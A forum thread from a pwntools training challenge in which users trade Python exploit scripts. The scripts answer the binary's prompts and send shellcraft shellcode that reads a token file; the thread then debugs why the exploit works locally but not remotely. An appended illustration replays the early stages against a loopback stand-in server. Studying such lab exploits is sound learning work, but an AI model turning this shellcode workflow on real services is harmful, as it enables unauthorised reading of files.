Forum Discussion
Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills
- 8 months ago
Well, as indicated in the Reddit sub:
...
shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcode)
print("Sending Shellcode:", shellcode, " ---#")
io.send(shellcode)
io.sendline()
...
should work. Looking at my old solution, I see that I remote connected: io = remote('10.102.180.68', 5000). Somehow I don't see this in your code. Could it be (it's been a long time) that you're working on the wrong endpoint?
I'm having real difficulties with this one. If I run it locally on my host, I am able to return my own token, but I get a seg fault. If I then move it across to remote using socat, I do not get the token returned. This is what I have:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
def main():
    # Local process only; no remote() connection is opened here
    r_tube = process("/opt/demonstrate-challenge")
    # Wait for the final prompt before sending the payload
    r_tube.recvuntil(b"The output may not display correctly in a terminal, so it may be safer to print it as a hexdump.")
    # Shellcode that writes 40 bytes of the token file to stdout (fd 1), then returns
    shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
    shellcode = asm(shellcode)
    r_tube.send(shellcode)
    # Collect everything the process prints, giving up after 5 seconds
    data = r_tube.recvall(5)
    print(hexdump(data))
if __name__ == "__main__":
    main()
I've tried the shellcode in every which way and, as I say, I can get it locally but not remote. Trying to run it on socat through my dev box, it fails as well, so I suspect it's something with socat that's not working as I expect. Wouldn't mind a nudge, as I've spent a few months on and off on this to no avail.
- IotS2024 8 months ago Bronze III
I think there are some steps missing in your code. Go up, take the provided code and make the adjustments in the replies, and it should work.
- talnet23 8 months ago Bronze I
Thanks for coming back to me. Sorry, I removed some of the steps for brevity, but this is the full code that works fine locally but not through the remote connection:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
def main():
    # Local process; the remote() line is commented out
    r_tube = process("/opt/demonstrate-challenge")
    #r_tube = remote("127.0.0.1", 1234)
    print("Stage 1")
    # Parse "What is the sum of A and B?" and answer with A + B
    r_tube.recvuntil(b"What is the sum of")
    line = r_tube.recvline().decode()
    nums = [int(x) for x in line.strip().replace('?', '').split(' and ')]
    answer = nums[0] + nums[1]
    r_tube.sendline(str(answer).encode())
    print("Stage 2")
    # Two numbers, sent back packed as 32-bit little-endian integers
    r_tube.recvuntil(b':')
    r_tube.recvline()
    line = r_tube.recvline().decode().strip()
    val1, val2 = [int(x) for x in line.split(" and ")]
    packed = p32(val1) + p32(val2)
    r_tube.send(packed)
    print("Stage 3")
    # Resolve the address of parsing_check from the binary's symbol table
    elf = ELF('/opt/demonstrate-challenge')
    parsing_check_addr = elf.symbols['parsing_check']
    r_tube.sendline(str(parsing_check_addr).encode())
    print("Stage 4")
    shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
    shellcode = asm(shellcode)
    r_tube.send(shellcode)
    data = r_tube.recvall(5)
    print(hexdump(data))
if __name__ == "__main__":
    main()
Again I get a SegFault with this, and copying the code above I get a SegFault too; both provide the token.txt locally but not through the remote connection.
- IotS2024 8 months ago Bronze III
Okay :) For me the following worked (just a part):
# Generate shellcode to read the file using pwntools shellcraft
context.arch = "amd64"
# Generate shellcode using shellcraft to read the file and print the content as hex
shellcode = asm(shellcraft.cat2("/home/token-user/token.txt"))
# Print out the shellcode in hexadecimal for easy inspection
print("Generated Shellcode:")
print(shellcode.hex())  # Print shellcode in hex format for debugging
# Send the shellcode payload
conn.sendline(shellcode)
I tried a lot of different approaches until I found this one. Try it out. It is the arch and an easier shellcode generation.
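The first reply's point is that the poster's script never opens a network connection: it always talks to a local process(), so "works locally, fails remotely" is exactly what you would expect. The following is an added illustration, not code from the thread or from the challenge, and it needs no pwntools: it reimplements the stage 1 and stage 2 exchange from talnet23's script (prompt parsing and the p32-style packing, via struct) against a constructed stand-in server on loopback, so the client is visibly driven over a TCP socket. The prompt wording, the numbers and the "stage 2 ok" reply are all made up for the demo; the real binary's output differs.

```python
import re
import socket
import struct
import threading

# Constructed stand-in prompts (not the real challenge's text). The stage-2 text
# is shaped so that the thread's recvuntil(b':'), recvline(), recvline() order
# lands on the "A and B" line.
STAGE1_PROMPT = b"What is the sum of 1234 and 5678?\n"
STAGE2_PROMPT = (b"Stage 2: pack the two values below as 32-bit unsigned integers\n"
                 b"(little-endian, 8 bytes total)\n"
                 b"40 and 50\n")


def recv_until(conn, marker):
    """Read one byte at a time until the buffer ends with marker (or EOF)."""
    buf = b""
    while not buf.endswith(marker):
        chunk = conn.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


def recv_line(conn):
    return recv_until(conn, b"\n")


def recv_exact(conn, n):
    """Read exactly n bytes (fewer only on EOF)."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def parse_sum_prompt(line):
    """Extract A and B from 'What is the sum of A and B?'."""
    m = re.search(rb"sum of (\d+) and (\d+)\?", line)
    if not m:
        raise ValueError("unexpected stage-1 prompt: %r" % line)
    return int(m.group(1)), int(m.group(2))


def parse_pair_line(line):
    """Parse 'A and B' into two ints."""
    a, b = line.strip().split(b" and ")
    return int(a), int(b)


def pack_pair(a, b):
    """Same bytes as pwntools p32(a) + p32(b): two little-endian uint32."""
    return struct.pack("<II", a, b)


def solve_stages(conn):
    """Client side, mirroring the order of reads/writes in the thread's script."""
    a, b = parse_sum_prompt(recv_line(conn))
    conn.sendall(str(a + b).encode() + b"\n")
    recv_until(conn, b":")          # recvuntil(b':')
    recv_line(conn)                 # recvline(): rest of that header line
    recv_line(conn)                 # recvline(): the explanatory line
    conn.sendall(pack_pair(*parse_pair_line(recv_line(conn))))
    return recv_line(conn).strip().decode()


def fake_challenge(conn):
    """Constructed server side: checks stage 1 and stage 2, then reports."""
    with conn:
        conn.sendall(STAGE1_PROMPT)
        a, b = parse_sum_prompt(STAGE1_PROMPT)
        if int(recv_line(conn).strip()) != a + b:
            conn.sendall(b"stage 1 failed\n")
            return
        conn.sendall(STAGE2_PROMPT)
        expected = pack_pair(*parse_pair_line(STAGE2_PROMPT.splitlines()[-1]))
        got = recv_exact(conn, len(expected))
        conn.sendall(b"stage 2 ok\n" if got == expected else b"stage 2 failed\n")


def run_demo():
    """Start the stand-in server on loopback and drive it over TCP."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    host, port = srv.getsockname()

    def serve():
        conn, _ = srv.accept()
        fake_challenge(conn)
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    # The step the thread hinges on: connect to the network endpoint
    # (pwntools remote(host, port)), not spawn a local process().
    client = socket.create_connection((host, port))
    with client:
        result = solve_stages(client)
    t.join(timeout=5)
    return result


if __name__ == "__main__":
    print(run_demo())
```

The only transport-specific lines are the listen/connect pair in run_demo; the stage logic in solve_stages takes any connected socket, which is the same separation pwntools gives you when both process() and remote() yield a tube. Keeping one script that chooses the tube by a flag (local binary vs. host:port) makes the "wrong endpoint" mistake from the first reply hard to make.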